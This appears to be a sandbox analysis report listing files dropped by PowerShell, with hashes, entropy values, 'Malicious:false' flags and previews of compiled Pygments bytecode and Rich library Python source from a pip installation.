                                                                                                                                                                                                                              SHA-256:922E33BBCAB21A16D9D9E1D4CB66839353C08E979072F283C18ADA190F4FC636
                                                                                                                                                                                                                              SHA-512:98BCB755C191B50363597DA04EF384991B5550ECAAB24F5125EA71B74F349B44F474BC3794F35B51C958C30319FD973F8966071763EC7E613FE20718FB8558A6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfa..............................d.Z.d.d.l.Z.d.d.l.m.Z.......e.j.....................e.e.j.....................................y.#.e.$.r.....e.j...................d...........Y.y.w.x.Y.w.).z.. pygments.__main__. ~~~~~~~~~~~~~~~~~.. Main entry point for ``python -m pygments``... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...main.....)...__doc__..sys..pip._vendor.pygments.cmdliner......exit..argv..KeyboardInterrupt........NC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/pygments/__main__.py..<module>r........sI....................-.........C.H.H.T.#.(.(.^................C.H.H.Q.K......s....."1...A.....A..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):26589
                                                                                                                                                                                                                              Entropy (8bit):5.521623826224342
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:qgjiVUWfCPHhz7nnJqxUgXU4ZF8GBcRP6W2xUOy:9+5CPBz7nGUgXU4ZGP72Kt
                                                                                                                                                                                                                              MD5:33492C034DF783C1321036A9751D7F27
                                                                                                                                                                                                                              SHA1:8134BB6848F8F6FD00CF9947323FF8C2BC620A01
                                                                                                                                                                                                                              SHA-256:D1C3F2FAEEC3B2F8669B2E109D0DD82B4B4AC6312758F25F01F0EF7900E7B9A4
                                                                                                                                                                                                                              SHA-512:4E98C6E67972CF010B080820BB578A62F5F9D190C52ADE8A171659990F9FAD3FD2029CF768173664F9DAFA4FDAE0E3CB830517ED91C7A9D8CA48285795E17C76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.\........................h.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"m#Z#..d.d.l$m%Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*m+Z+..d.d.l,m-Z-m.Z...d...Z/d...Z0d...Z1d...Z2d...Z3d...Z4..G.d...d.e.jj..........................Z5e.jl..................f.d...Z7y.).z.. pygments.cmdline. ~~~~~~~~~~~~~~~~.. Command line interface... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...dedent)...__version__..highlight)...ClassNotFound..OptionError..docstring_headline..guess_decode..guess_decode_from_terminal..terminal_encoding..UnclosingTextIOWrapper)...get_all_lexers..get_lexer_by_name..guess_lexer..load_lexer_from_file..get_lexer_for_filename..find_lexer_class_for_filename)...TextLexer)...LatexEmbeddedLexer..LatexFormatter)...get_all_formatters..get_formatter_by_name..load
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2610
                                                                                                                                                                                                                              Entropy (8bit):5.616355978534251
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:lANaUGlGGwdCsxS6CLef+EwHO64tabBZQkKd+g2viSv2m5I37pd:tVkNCoS6Cifs8e7dvi+Uj
                                                                                                                                                                                                                              MD5:BA1B3E73B619392FC10E6DD97E6FB304
                                                                                                                                                                                                                              SHA1:32A5A4AC2F28AEEC564E799E9C33EE930C69AA23
                                                                                                                                                                                                                              SHA-256:EAE57247BA3FC05400F0DAEFC86CC5B73095924551FF8282FE836513B27E8D71
                                                                                                                                                                                                                              SHA-512:CE46B959A4311454AD0B3F391D527BBE25B63304B36311E73E4D2C53A0F0F3B2CE6EECF9506F0C69160EC092F745766719DFA5FB2402AF2BCAFAF197B4A9506D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................$.....d.Z.d.Z.i.Z.d.e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...g.d...Z.g.d...Z.d.Z...e.e.e.........D.]#..\...Z.Z.e.d.e.z...z...e.e.<...e.d.d.e.z...z...z...e.e.<...e.d.z...Z..%..[.[.[.e.d.....e.d.<...d...Z.d...Z.d...Z.y.).z.. pygments.console. ~~~~~~~~~~~~~~~~.. Format colored console output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details..z..[..z.39;49;00m..reset..01m..bold..02m..faint..03m..standout..04m..underline..05m..blink..06m..overline)...black..red..green..yellow..blue..magenta..cyan..gray)...brightblack..brightred..brightgreen..brightyellow..brightblue..brightmagenta..brightcyan..white.....z.%im.<........r....c...........................t.........d.....S...Nr........codes........MC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/pygments/console.py..reset_colorr*...(...s..........
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3216
                                                                                                                                                                                                                              Entropy (8bit):5.205834169174311
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:ZCaaSGZUGtuBWjfyzLXitxOvKaWp1+erceh4ev5Yne8a6i/go3qveLPzGxqUkAA:ZhaSkUIuofyfKbUW4M58u6MChjA
                                                                                                                                                                                                                              MD5:A55AD86E30CA42B3BBF85C859845280A
                                                                                                                                                                                                                              SHA1:D2B79716CA75753F6C1A34BD97DD5F5D10C719E3
                                                                                                                                                                                                                              SHA-256:C111253BFE9B0C77758933D2FDDD8522C52CDCBF062E5FE0FA2B8180D8953477
                                                                                                                                                                                                                              SHA-512:043197B45BB5923C442CD92C45CA8FAE85D5FF78DAED219947DDCBE51930E018790F5F2484A090BDEC8F1565B6849EF7F72592CD4B9CB53F97E2EEAD4FE2F769
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................@.....d.Z.d.d...Z.d...Z...G.d...d.........Z...G.d...d.e.........Z.y.).z.. pygments.filter. ~~~~~~~~~~~~~~~.. Module that implements the default filter... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details..Nc.....................2.........f.d...}.|.D.]...}...|.|.|.........}.....|.S.).z.. Use this method to apply an iterable of filters to. a stream. If lexer is given it's forwarded to the. filter, otherwise the filter receives `None`.. c................3....F.....K.....|.j.....................|.........E.d.{.............y.7.....w...N)...filter)...filter_..stream..lexers.... ..LC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/pygments/filter.py.._applyz.apply_filters.<locals>._apply....s..............>.>.%....0..0..0.s......!.......!...).r......filtersr....r....r....s.... ` r......apply_filtersr........s(..........1.......)...........(......)....M.....c....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4553
                                                                                                                                                                                                                              Entropy (8bit):5.233204261583477
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:kCppX/fc3BBmgwGvCt798FkwMv/6ypXRIqF9Osqy0:kyuH88Fk/7RIUOsY
                                                                                                                                                                                                                              MD5:793039789353223E2E4C5C7AC16A3B4B
                                                                                                                                                                                                                              SHA1:E1669A8AF6CB62E709F021B81A4EF8BD9BAC9582
                                                                                                                                                                                                                              SHA-256:7CCF22B9F8C1CF60E1671A9466A871796B03B0B9BC6D3F0F476C48D6FC582E29
                                                                                                                                                                                                                              SHA-512:4A2B2BF82CE9144BD7390846A182BAB407DA1AD218426E5F7614B3190048E28F204205C52AF799D323B1C70E1A698607AAD570934C2EA9CBA3F7B1EB8A2B9BAF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfR.........................H.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.g.Z.d...Z...G.d...d.........Z.y.).z.. pygments.formatter. ~~~~~~~~~~~~~~~~~~.. Base formatter class... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...get_bool_opt)...get_style_by_name..Formatterc.....................<.....t.........|.t.................r.t.........|.........S.|.S.).N)...isinstance..strr....)...styles.... .OC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/pygments/formatter.py.._lookup_styler........s..........%....... ....'..'....L.....c.....................4.....e.Z.d.Z.d.Z.d.Z.g.Z.g.Z.d.Z.d...Z.d.d...Z.d...Z.y.).r....a..... Converts a token stream to text... Formatters should have attributes to help selecting them. These. are similar to the corresponding :class:`~pygments.lexer.Lexer`. attributes... .. autoattribute:: name. :no-value:.. .. autoattribute:: aliases.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):38313
                                                                                                                                                                                                                              Entropy (8bit):5.497414940039368
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:ftyVs+HKAeM7MyKZ6fDc4Dv0oXGFoYywXvLRp638kh:feTcZ64OGFqwfLS3X
                                                                                                                                                                                                                              MD5:A9FF08443CA172C9F6262D36E16F1835
                                                                                                                                                                                                                              SHA1:041D9292F1677A79E55852CFAE5C39D045C2C2FA
                                                                                                                                                                                                                              SHA-256:91EDA332EA3AE6141778F73B1CAA06831EB07CC0FC4542EA478822ED9612B5AB
                                                                                                                                                                                                                              SHA-512:7603933BE4DF36EB0F1323461BE701DC0FA92CA150143E2089E1BDD49EBCB97B0B20C9C081739567B8BB1C5F386E92EA6D7D751914CC921A2085AAC193548F6F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf:.........................X.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z...e.j2..................d.........Z.g.d...Z...e.d...........Z...G.d...d.e.........Z...G.d...d.e...........Z ..G.d...d.e ........Z!..G.d...d.e"........Z#..G.d...d.........Z$..e$........Z%..G.d...d.e&........Z'..G.d...d.........Z(d...Z)..G.d...d.........Z*..e*........Z+d...Z,..G.d...d ........Z-..G.d!..d"e.........Z...G.d#..d$e.........Z/..G.d%..d&e e/..........Z0..G.d'..d(........Z1..G.d)..d*e0........Z2d+..Z3..G.d,..d-e/........Z4..G.d...d/e0e4..........Z5y.)0z.. pygments.lexer. ~~~~~~~~~~~~~~.. Base lexer classes... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...apply_filters..Filter)...get_filter_by_name)...Error..Text..Other..Whitespace.._TokenType)...get_bool_opt..get_int_opt..get_list_opt..make_analysator..Future..guess
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1552
                                                                                                                                                                                                                              Entropy (8bit):5.548924406148653
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:Trkx/GAoq3qk8/7Yi2wYFiKNnfoSCt5mQkB4r2ZVpamaN81ajAnG4ZrKI6id7wx:Trkx/GJ6bfBs5mQkVVy8U4ZrsiFwx
                                                                                                                                                                                                                              MD5:A15DABB6CDFC84BF88DDD2AC7451E4DC
                                                                                                                                                                                                                              SHA1:F37FCC62506FAD907FA8EC2B34B2A404A9B27BA9
                                                                                                                                                                                                                              SHA-256:DCB08484A4EFECD77272524BCEECABDDACB74AF285C5634D686DA646A96A4405
                                                                                                                                                                                                                              SHA-512:9A617CDF5C6BBF5F3F1D6F3C8D852DBE73BBE93741363708ECABB90E8E4CCB57570E4D335BB664A7D45C25A082FEC0AC61BC5D9C7BD4CAA76C9CF9248980EEBD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................^.....d.Z.d.d.l.Z.d.g.Z...e.j...................d.e.j...........................Z.d...Z.d.d...Z.y.).z.. pygments.modeline. ~~~~~~~~~~~~~~~~~.. A simple modeline parser (based on pymodeline)... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N..get_filetype_from_bufferze. (?: vi | vim | ex ) (?: [<=>]? \d* )? :. .* (?: ft | filetype | syn | syntax ) = ( [^:\s]+ ).c.....................T.....t.........j...................|.........}.|.r.|.j...................d.........S.y.).N.....)...modeline_re..search..group)...l..ms.... .NC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/pygments/modeline.py..get_filetype_from_liner........s(...............1....A.......w.w.q.z.............c...........................|.j...........................}.|.d.|...d.z...d.......D.]...}.t.........|.........}.|.s...|.c...S...t.........|.d.d.........D.]%..}.|.t.........|.........k..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3380
                                                                                                                                                                                                                              Entropy (8bit):5.515959612838604
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:edWOhRbZ6mQ4Aa4vRpmCgVVGtEUc5dSs+yBMRMbd1fCwPTVGBRPKuomiAAiyyiiG:ePhRbZ6rNLvOCWVOEUcx3fCQ0BVpoT
                                                                                                                                                                                                                              MD5:82F4D7BEBD20B92A6E5B991861D4FB90
                                                                                                                                                                                                                              SHA1:F71017BDFE78EDF4F17EF5DBB50DD0BC3922F13C
                                                                                                                                                                                                                              SHA-256:C6184D63738856FD010E5E3585BE174F2B7493759BCFF5FE3EFEBC864392C9F2
                                                                                                                                                                                                                              SHA-512:28D1B16466510D86AA7EACF60DE073BE59DC8A2C8D98690AE1180FDE0768D3863D94DDBBAA3EF1216F1E4D21CB2F187DFEA1898891DBA22000202E2412C50EA7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................6.....d.Z.d.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.).a..... pygments.plugin. ~~~~~~~~~~~~~~~.. Pygments plugin interface. By default, this tries to use. ``importlib.metadata``, which is in the Python standard. library since Python 3.8, or its ``importlib_metadata``. backport for earlier versions of Python. It falls back on. ``pkg_resources`` if not found. Finally, if ``pkg_resources``. is not found either, no plugins are loaded at all... lexer plugins::.. [pygments.lexers]. yourlexer = yourmodule:YourLexer.. formatter plugins::.. [pygments.formatters]. yourformatter = yourformatter:YourFormatter. /.ext = yourformatter:YourFormatter.. As you can see, you can define extensions for the formatter. with a leading slash... syntax plugins::.. [pygments.styles]. yourstyle = yourstyle:YourStyle.. filter plugin::.. [pygments.filter]. yourfilter = y
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4065
                                                                                                                                                                                                                              Entropy (8bit):5.576181220325243
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:xZe1fiTrACsTJsoV/MsH54Q1uuu1woeFpBFaxP2MN1OU:oqoCsTJsoNV5Kuu1HIBgxP2MN1OU
                                                                                                                                                                                                                              MD5:5FE689E0E164DD14F75ACB9F77D003D9
                                                                                                                                                                                                                              SHA1:DECCE956DD2C62FBB5FF80C41D271CB74A9A217B
                                                                                                                                                                                                                              SHA-256:C6A2D5F2669862BC21186F35C36930DB6FE5D3E427854C163CC85059EC4803EA
                                                                                                                                                                                                                              SHA-512:8D1AEBF0DAE543F451647BDF283CBB8254480B5E479D94DCD023C270FF9DA53B9C4BF91360B8D32B1E0157683BDE1DB5307C901F04AF49ECB5B46420B9BE2625
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................d.........Z...e.d.........Z.d...Z.d...Z.d.d...Z.y.).a..... pygments.regexopt. ~~~~~~~~~~~~~~~~~.. An algorithm that generates optimized regexes for matching long lists of. literal strings... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...escape)...commonprefix)...groupby)...itemgetterz.[\[\^\\\-\]]c.....................Z.....d.t.........j...................d...d.j...................|.................z...d.z...S.).N..[c.....................(.....d.|.j...........................z...S.).N..\)...group)...ms.... .NC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/pygments/regexopt.py..<lambda>z.make_charset.<locals>.<lambda>....s.................)9...........])...CS_ESCAPE..sub..join)...letterss.... r......make_charsetr........s'................9.2.7.7.7.;K..L..L.s..R..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4740
                                                                                                                                                                                                                              Entropy (8bit):5.0098303192927665
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:0Eit5EKk5qfMcVwMM/h97ffyk/gIzQ0Aj4NPcwpqzve:ritnt0cVwMMX73yzIqjePvYz2
                                                                                                                                                                                                                              MD5:D9BF5D44D2FE07E315931DE6036D8818
                                                                                                                                                                                                                              SHA1:9AEC4D00856D3542CCE9F92676851FE951561E1E
                                                                                                                                                                                                                              SHA-256:F7A6637C1BF09E764BFA2979D5FE020B2AD90088B39EFCEB1BA3B94C1296373F
                                                                                                                                                                                                                              SHA-512:728D44688F6CA5F3161DFFAC02E2A6D18E08789B73B4427CD233FE3576F8EEB6DE49F0F78B4BB4BC0688132282DFB160D09E7BB8FF9E1F3F1495AEB67F891584
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................:.....d.Z.d.d.l.Z...G.d...d.e.........Z...G.d...d.........Z.y.).a..... pygments.scanner. ~~~~~~~~~~~~~~~~.. This library implements a regex based scanner. Some languages. like Pascal are easy to parse but have some keywords that. depend on the context. Because of this it's impossible to lex. that just by using a regular expression lexer like the. `RegexLexer`... Have a look at the `DelphiLexer` to get an idea of how to use. this scanner... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......Nc...........................e.Z.d.Z.d.Z.y.)...EndOfTextzZ. Raise if end of text is reached and the user. tried to call a match function.. N)...__name__..__module__..__qualname__..__doc__........MC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/pygments/scanner.pyr....r........s...........r....r....c.....................b.....e.Z.d.Z.d.Z.d.d...Z.d...Z.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11030
                                                                                                                                                                                                                              Entropy (8bit):5.339923740149198
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:MMxMGaRyuY4EkU50RTs3iCB7Pe7FS5OTiecqyLGp40pQvsXEAfyOcW2cRtQRr4AA:f2EWUGVfMz0zVQkXEAfWuRtQoJpO+
                                                                                                                                                                                                                              MD5:34D89259E562AD431784797CA6B7708D
                                                                                                                                                                                                                              SHA1:0BAA14083D37A9FB1E320875019DC4D59F583A69
                                                                                                                                                                                                                              SHA-256:839ED726237FA1D16C987610902D97AAAE17F0A693EA00DDE287B2D7F5B90296
                                                                                                                                                                                                                              SHA-512:8E279499D4C6230F2E623670EBA1AEFBF542624FE6D7A1DF1639FEA98D2131EF5090409DE82037C1CA141869A72A3615C1FC782253F8421227D1AD4F361EFF41
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................l.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z...G.d...d.e.........Z.d...Z.y.).a..... pygments.sphinxext. ~~~~~~~~~~~~~~~~~~.. Sphinx extension to generate automatic documentation of lexers,. formatters and filters... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...nodes)...ViewList)...Directive)...nested_parse_with_titlesz.... module:: %s..%s.%s.zX... class:: %s.. :Short names: %s. :Filenames: %s. :MIME types: %s.. %s..zA... class:: %s.. :Short names: %s. :Filenames: %s.. %s..z'... class:: %s.. :Name: %s.. %s..c.....................B.....e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...PygmentsDoczn. A directive to collect all lexers/formatters/filters and generate. autoclass directives for them.. F.....r....c..........................t.................|._.........|.j.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):642
                                                                                                                                                                                                                              Entropy (8bit):4.516724769327098
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:rcTEwcqi2h0SCu/ABi2rKokoGdEuzCb/AChoyl4qHGr:N6juSCubyKlouEuzCbloOfw
                                                                                                                                                                                                                              MD5:B7ED359477B4D6BEB67CE0E6151DA181
                                                                                                                                                                                                                              SHA1:CFD7926ADB4A02CB6DF8794999212C6F026AF1F1
                                                                                                                                                                                                                              SHA-256:E693F729CE5DE1027F734285B31ADFCA18E23D57BB275CCEA9215B140CDC57E6
                                                                                                                                                                                                                              SHA-512:25D444DB76150D745C7C2999A50C0DECA140E000072440729B177808959BF8F3CAC42C475A12F81A379300C8C3E3B9E76317319D12C0A79D8AF9D50748A4574A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:class ConsoleError(Exception):. """An error in console operation."""...class StyleError(Exception):. """An error in styles."""...class StyleSyntaxError(ConsoleError):. """Style was badly formatted."""...class MissingStyle(StyleError):. """No such style."""...class StyleStackError(ConsoleError):. """Style stack is invalid."""...class NotRenderableError(ConsoleError):. """Object is not renderable."""...class MarkupError(ConsoleError):. """Markup was badly formatted."""...class LiveError(ConsoleError):. """Error related to Live display."""...class NoAltScreen(ConsoleError):. """Alt screen mode was required.""".
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1683
                                                                                                                                                                                                                              Entropy (8bit):4.320644546482158
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:DWGfMhcNFoKA54Y3V7oeWQ5CiCc3VbZaoR5k5CVE8YazSO9eDyTU:yGk2NFoKpqV6QUiCSDR2CVPYehJU
                                                                                                                                                                                                                              MD5:EEDD79E924FC4C14DD6F3DF7D8F460E3
                                                                                                                                                                                                                              SHA1:5F7DEE3CCC5B50B923ADAEC01508DFB25984ACD6
                                                                                                                                                                                                                              SHA-256:4E5F531CC0D9F8F9395A6F2C23580683F5390E1BAC9B10FE159D1F51B714D16D
                                                                                                                                                                                                                              SHA-512:320142274E3C162DA113797D2BD5E9B260B04A04F1CD5B5DC081955568740C7851DA0B1C9DC036269026D84ECF07181AFB7CDAC2960CA99B705BFF343E545292
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import io.from typing import IO, TYPE_CHECKING, Any, List..from .ansi import AnsiDecoder.from .text import Text..if TYPE_CHECKING:. from .console import Console...class FileProxy(io.TextIOBase):. """Wraps a file (e.g. sys.stdout) and redirects writes to a console.""".. def __init__(self, console: "Console", file: IO[str]) -> None:. self.__console = console. self.__file = file. self.__buffer: List[str] = []. self.__ansi_decoder = AnsiDecoder().. @property. def rich_proxied_file(self) -> IO[str]:. """Get proxied file.""". return self.__file.. def __getattr__(self, name: str) -> Any:. return getattr(self.__file, name).. def write(self, text: str) -> int:. if not isinstance(text, str):. raise TypeError(f"write() argument must be str, not {type(text).__name__}"). buffer = self.__buffer. lines: List[str] = []. while text:. line, new_line, text = text.partition("\n").
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2508
                                                                                                                                                                                                                              Entropy (8bit):4.67502595075713
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:A0ui7on+74Z+QEXuiQ1mdxybusu8h/gjIUkaN/okR3:572Y9Xuiz7+up0oqaN/okR3
                                                                                                                                                                                                                              MD5:AFA45BB4BF3F0CFB52834633577D8C76
                                                                                                                                                                                                                              SHA1:E9B82AC44BD515E9BAE642FF0361163D5F9DB497
                                                                                                                                                                                                                              SHA-256:F5F4CB00F080C079815DD46FECA654D7DE234A036B45BE96C7B448A0182A78A6
                                                                                                                                                                                                                              SHA-512:6BA700D004503308230880FFA7679983A057AF93B52C744F0232C5165117DA9310B12BD242DF3FE41E227C4D9EF5310FCBBF82E9522D1284A7CE1EFD576A08BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# coding: utf-8."""Functions for reporting filesizes. Borrowed from https://github.com/PyFilesystem/pyfilesystem2..The functions declared in this module should cover the different.use cases needed to generate a string representation of a file size.using several different units. Since there are many standards regarding.file size units, three different functions have been implemented...See Also:. * `Wikipedia: Binary prefix <https://en.wikipedia.org/wiki/Binary_prefix>`_.."""..__all__ = ["decimal"]..from typing import Iterable, List, Optional, Tuple...def _to_str(. size: int,. suffixes: Iterable[str],. base: int,. *,. precision: Optional[int] = 1,. separator: Optional[str] = " ",.) -> str:. if size == 1:. return "1 byte". elif size < base:. return "{:,} bytes".format(size).. for i, suffix in enumerate(suffixes, 2): # noqa: B007. unit = base**i. if size < unit:. break. return "{:,.{precision}f}{separator}{}".format(.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9584
                                                                                                                                                                                                                              Entropy (8bit):5.270448785281885
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:SLbENaptpKpWxjWpx5uusB7ugLUL3dI90idFlJY1:abEw2PsUL3E0h1
                                                                                                                                                                                                                              MD5:15B3201BCD1703E773C79C0053D01959
                                                                                                                                                                                                                              SHA1:08E6DCC03CD8F4A3463CADF6E2A261AF2AE38376
                                                                                                                                                                                                                              SHA-256:A770B5838418CDECC529D47B345F4484F6F3403BDD3D48464604B21861263E4A
                                                                                                                                                                                                                              SHA-512:D47B0DCE12CB0BDEA354A58110B63928782C98A7D112E9A4CD6A927B7345C23D3C156046F15E18CF98EDCC11A6051381F796C8ABB1FAD2BE2EAD17A58F0A35BF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import re.from abc import ABC, abstractmethod.from typing import List, Union..from .text import Span, Text...def _combine_regex(*regexes: str) -> str:. """Combine a number of regexes in to a single regex... Returns:. str: New regex with all regexes ORed together.. """. return "|".join(regexes)...class Highlighter(ABC):. """Abstract base class for highlighters.""".. def __call__(self, text: Union[str, Text]) -> Text:. """Highlight a str or Text instance... Args:. text (Union[str, ~Text]): Text to highlight... Raises:. TypeError: If not called with text or str... Returns:. Text: A test instance with highlighting applied.. """. if isinstance(text, str):. highlight_text = Text(text). elif isinstance(text, Text):. highlight_text = text.copy(). else:. raise TypeError(f"str or Text instance required, not {text!r}"). self.highlight(highlight_
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5032
                                                                                                                                                                                                                              Entropy (8bit):4.466426445558653
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:40lTCrl97vb7yITrKGcvjP0fuviKay0TRGcvjP0fUAqdkGKnNbv77y4TwQlxetzI:rl6b77rr28ndkGIp7rwIYhpv/lqz2Bdi
                                                                                                                                                                                                                              MD5:7FBA872AF480BCD52330CFC0AE89A99C
                                                                                                                                                                                                                              SHA1:C295E68F1E004ADE154E8389785FD6CB1B1F6F06
